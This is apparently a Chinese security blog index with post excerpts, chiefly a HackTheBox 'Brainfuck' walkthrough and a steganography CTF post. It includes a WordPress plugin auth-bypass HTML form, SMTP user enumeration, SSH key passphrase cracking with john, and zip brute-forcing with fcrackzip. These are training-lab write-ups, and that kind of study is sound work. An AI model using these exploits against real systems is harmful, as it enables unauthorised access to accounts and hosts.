shodan+msf

发表于 2019-08-07 | 分类于 tools

发表于 2019-08-05 | 分类于 tools

参考：Docker 入门教程

阅读全文 »

proxychains&reGeorg

发表于 2019-08-02 | 分类于 tools

proxychains

阅读全文 »

记录一下vmware安装vmtools

发表于 2019-08-01 | 分类于 tools

记录一下vmware安装vmtools

参考资料：https://docs.vmware.com/en/VMware-Workstation-Pro/15.0/com.vmware.ws.using.doc/GUID-08BB9465-D40A-4E16-9E15-8C016CC8166F.html

remnux安装vmtools

cd /mnt/cdrom

mount /dev/cdrom /mnt/cdrom

cd /tmp               因为/mnt/cdrom是只读目录，所以要切换tmp目录

tar zxpf /mnt/cdrom/VMwareTools-xxx.tar.gz 解压到tmp目录，发现多了一个vmware-tools-distrib

cd vmware-tools-distrib

./vmware-install.pl

一路回车，即可完成vmtools的安装

当你点击“虚拟机”菜单栏，显示“重新安装 vmware tools，说明安装成功。

kali安装vmtools

  cp VMwareTools-10.2.5-8068393.tar.gz /tmp
  cd tmp
  tar -zxvf VMwareTools-10.2.5-8068393.tar.gz 
  cd vmware-tools-distrib/
  ./vmware-install.pl 
  history

阅读全文 »

node总结-web蜘蛛爬行失败怎么办

发表于 2019-07-31 | 分类于 web

上一篇： Node（源码泄露+密码学相关）

因为没有遇到过的新东西有点多，所以新开一篇。

？web扫描失败怎么办。

answer: 用burp proxy拦截，查看是否是user-agent字段导致的。用gobuster可以修改http头，再次扫描。

一开始我用的dirbuster，提示你扫描的页面不符。当初我没有想太多，就用了paros，找到了那个MD5密码所在的页面。

其实还是值得总结一下。

监听本地端口

访问任何页面，目标机的地址都会跳转回主页，于是用burp: 添加一个监听代理

添加监听目标的ip和端口

访问代理监听的localhost:8081，等于访问192.168.1.129:3000

扫描本地端口

确保burp intercept is on ，拦截开启进行扫描，然后返回burp gobuster -u http://localhost:8081 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt

点击forward，将数据包放过，然后在http history里可以查看。可以将想要的数据包右键发送到repeater。

可以看到因为是gobuster的user-agent，所以目标主机进行了拦截。如果我们换成firefox的请求头，或者直接删除user-agent。目标网站显示正常页面。

所以通过自定义gobuster用户请求头，就可以进行正常网站爬行。

乱码的文件

用file命令再识别一下。编码一次难道就不能再加密了吗(；′⌒`)

？mongo数据库的使用

什么关系型、非关系型数据库？

sql = structure query language = 结构化查询语句 sql就是通用的关系型数据库语言。

no sql ，是sql的阉割版，就是说非关系数据库功能更少。其实对于某些用户使用计算机来说，装qq和影视播放器加浏览器就够了。非关系型数据库也是一样的道理。

关于mongodb

Mongo Shell 是 JS 作为主语言的。

MongoDB 是一个介于关系数据库和非关系数据库之间的产品，是非关系数据库当中功能最丰富，最像关系数据库的。

阅读全文 »

gobuster-web目录扫描

发表于 2019-07-31 | 分类于 scan

参考资料：https://github.com/OJ/gobuster

阅读全文 »

awvs和appscan登陆扫描

发表于 2019-07-30 | 分类于 scan

为了节约时间，用工具辅助人工进行测试，在遇到数十个网站需要进行渗透测试的时候，使用自动化扫描工具是个明智的选择。

阅读全文 »

Brainfuck靶机渗透实践-rsa算法和维吉尼亚解密

发表于 2019-07-16 | 分类于 ctf

hackthebox是一个在线的渗透平台，通过渗透获取邀请码，即可在这个平台上注册一个账号。

该平台的在线靶机一共20台，每周会下线一台靶机，如果靶机下线了呢，分数就会全部清空。而成功渗透靶机就能获取一定的分数，分数够了就能提升等级。

在线的靶机都是没有writeup的，所以你的等级很大程度可以证明你的渗透实战能力。

该平台一共7个用户等级，刚注册是等级Noob：

Noob 无知者
script kiddle 脚本小子
hacker 黑客
Pro hacker 专业黑客
Elite Hacker 精英黑客
Guru 大师
Omniscient （最高等级）无所不知者

靶机的分数为20-50分

20分-easy 简单
30分-medium 中等难度
40分-hard 困难的
50分-Insane 疯狂的

下面介绍关于过期的机器Brainfuck的渗透过程，难度等级为hard。

扫描

用脚本扫描，好处是不用每次输入很多命令。运行以下脚本，输入IP：10.10.10.17，即可扫描udp和tcp的65535个端口，以及端口的版本。

#!/bin/bash

read -p "which ip? " ip
masscan -p1-65535,U:1-65535 ${ip} --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports

what=$(awk 'NR<=1 {print $6}' ports)
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports ${what} -oA ${ip}
nmap -Pn -sU -sV -sC -p$ports ${what} -oA ${ip}-udp.xml

nikto -h http://${ip} > nikto-${ip}.txt

以下是扫描结果：

Discovered open port 25/tcp on 10.10.10.17                                     
Discovered open port 443/tcp on 10.10.10.17                                    
Discovered open port 22/tcp on 10.10.10.17                                     
Discovered open port 143/tcp on 10.10.10.17                                    
Discovered open port 110/tcp on 10.10.10.17      

PORT    STATE SERVICE  VERSION

22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 

110/tcp open  pop3     Dovecot pop3d

|_pop3-capabilities: TOP UIDL CAPA RESP-CODES SASL(PLAIN) USER PIPELINING AUTH-RESP-CODE

143/tcp open  imap     Dovecot imapd

|_imap-capabilities: IDLE IMAP4rev1 LITERAL+ more listed have capabilities LOGIN-REFERRALS ENABLE ID OK post-login Pre-login SASL-IR AUTH=PLAINA0001

443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!

| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR

| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
                             
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

smtp（简单邮件传输协议）枚举存在用户

smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.17

web分析

访问地址https://10.10.10.17

Welcome to nginx!
If you see this page, the nginx web server is successfully installed and working

nmap、nikto，都显示了域名：commonName=brainfuck.htb

同样也可以用sslyze查询域名。

sslyze --regular 10.10.10.17 > /root/Desktop/10.10.10.17/domain
cat /root/Desktop/10.10.10.17/domain | grep "Name"

用burp，将host修改为brainfuck.htb，可以看到nginx 默认配置页面变成了另一个页面。访问https://brainfuck.htb/，可以看到wordpress站

修改/etc/hosts echo 10.10.10.17 brainfuck.htb sup3rs3cr3t.brainfuck.htb www.brainfuck.htb>> /etc/hosts

分析三个域名的网页

访问：https://brainfuck.htb/，https://www.brainfuck.htb，https://sup3rs3cr3t.brainfuck.htb

wordpress扫描器——wpscan

wpscan --url https://brainfuck.htb/ --disable-tls-checks

WordPress version 4.7.3 

WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution (RCE)

该扫描器发现了4个插件漏洞。主要是“WP Support Plus Responsive Ticket System”

searchsploit

searchsploit WP Support Plus Responsive

searchsploit -m exploits/php/webapps/34589.txt
searchsploit -m exploits/php/webapps/41006.txt
searchsploit -m exploits/php/webapps/40939.txt

经过测试，找到了可用exp

wordpress插件“WP Support Plus Responsive Ticket System 7.1.3”提权漏洞。https://www.exploit-db.com/exploits/41006

你可以无需知道密码以任何用户名登陆，因为使用函数wp_set_auth_cookie()的方式不正确。

漏洞利用

将以下表单，保存为exp.html

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">

	Username: <input type="text" name="username" value="admin">

	<input type="hidden" name="email" value="sth">

	<input type="hidden" name="action" value="loginGuestFacebook">

	<input type="submit" value="Login">

</form>

用python开启本地服务器

点击exp.html，跳转到一个表单，点击Login

稍等一会儿，然后访问wordpress的管理页面https://brainfuck.htb/wp-admin，发现我们进行漏洞利用成功了。

获得web后台权限

登陆wordpress表单后，网站后台获得一个口令。 orestis | kHGuERB29DNiNE

获得了一个口令，然后我们用这个口令登入143端口，这是IMAP服务。Internet Message Access Protocol（互联网邮件访问协议）

简便起见，我们使用图形化界面的邮件客户端。

配置IMAP客户端

username: orestis
password: kIEnnfEKJ#9UmdO

得到了一个论坛的口令，在论坛https://sup3rs3cr3t.brainfuck.htb/以该口令登陆，然后看到了一些编码后的信息。

搜索Vigenere加密（维吉尼亚密码），在在线网站http://www.dcode.fr/vigenere-cipher进行解密

维吉尼亚密码

在一个凯撒密码中，字母表中的每一字母都会作一定的偏移，例如偏移量为3时，A就转换为了D、B转换为了E……而维吉尼亚密码则是由一些偏移量不同的恺撒密码组成。

为了生成密码，需要使用表格法。这一表格包括了26行字母表，每一行都由前一行向左偏移一位得到。具体使用哪一行字母表进行编译是基于密钥进行的，在过程中会不断地变换。

破译维吉尼亚密码的关键在于它的密钥是循环重复的。如果我们知道了密钥的长度，那密文就可以被看作是交织在一起的凯撒密码，而其中每一个都可以单独破解。使用卡西斯基试验和弗里德曼试验来得到密钥的长度。

将图中的字符串解密，得到了一个http地址，下载文件后，发现是ssh密钥。 https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa

chmod 400 id_rsa
ssh -i id_rsa orestis@10.10.10.17

尝试连接，发现需要密码。于是我们用john爆破密码。

http://grayhat.shoutwiki.com/wiki/SSH_tricks，这篇blog提到的方法，可以破解id_rsa的密钥。

wget https://raw.githubusercontent.com/stricture/hashstack-server-plugin-jtr/master/scrapers/sshng2john.py

python sshng2john.py id_rsa > id_rsa.encrypted

john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt

获得user权限

接下来准备提取root权限，我们看到目录下，有一个c代码，将/root/root.txt（这个是我们想要获取的flag）进行编码，生成了debug.txt

在这里，我们需要知道一点RSA算法。 https://zh.wikipedia.org/wiki/RSA

跟我复习一下RSA算法的原理。 P、Q是随意选择的两个质数（越大越安全） e是随意选择的一个整数，e与m（m与p和q相关）互为质数。 n是pq的乘积。

公布的数是n和e，其他的数字作为私钥不公布。注意，这里总共提到了四个数PQNE，PQ是随意选择的质数，

m与PQ相关，e与m相关，n是PQ之积

也就是说只有三个数是规定的，pqe

而在代码中，将pqe这三个数写入了debug.txt

debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')

于是我们来查看一下debug.txt

写一段python代码，将output.txt “Encrypted Password:”这一段密码解密，通过参数pqe（debug.txt给出）以及rsa算法解密，即可得到flag。

阅读全文 »

图片隐写（一）

发表于 2019-07-11 | 分类于 ctf

图片隐写

lsb

题目地址

SSAINISHPBOB

复杂的QR_code

题目地址

http://ctf5.shiyanbar.com/stega/QR_code.png

binwalk -e QR_code.png
fcrackzip -b -l 4-4 -u 4number.txt.zip -v -c 1
unzip 4number.txt.zip

-b爆破，-l说明密码长度，-u是文件，-v是详细输出，-c是密码字典类型

FIVE1

binwalk 1111110000000000.jpg

DECIMAL   	HEX       	DESCRIPTION
-------------------------------------------------------------------------------------------------------
7395      	0x1CE3    	Zip archive data, at least v2.0 to extract, compressed size: 32506, uncompressed size: 45602, name: "hacker.jpeg"  
40073     	0x9C89    	End of Zip archive 

fcrackzip -b -u -l 1-5 hacker.jpeg.zip

cat hacker.jpeg

echo "LS0uLi4gIC4tICAuLi4uLiAgLS0uLi4gIC4tICAuLi4uLiAgLi0gIC0tLi4uICAuLi4uLSAgLi4uLS0gIC0tLS4uICAtLS0tLiAgLi4uLi0gIC4tICAtLS0tLSAgLiAg" >1.txt

cat 1.txt | base64 -d

摩斯电码在线解码

得到7a57a5a743894a0e

https://www.cmd5.com/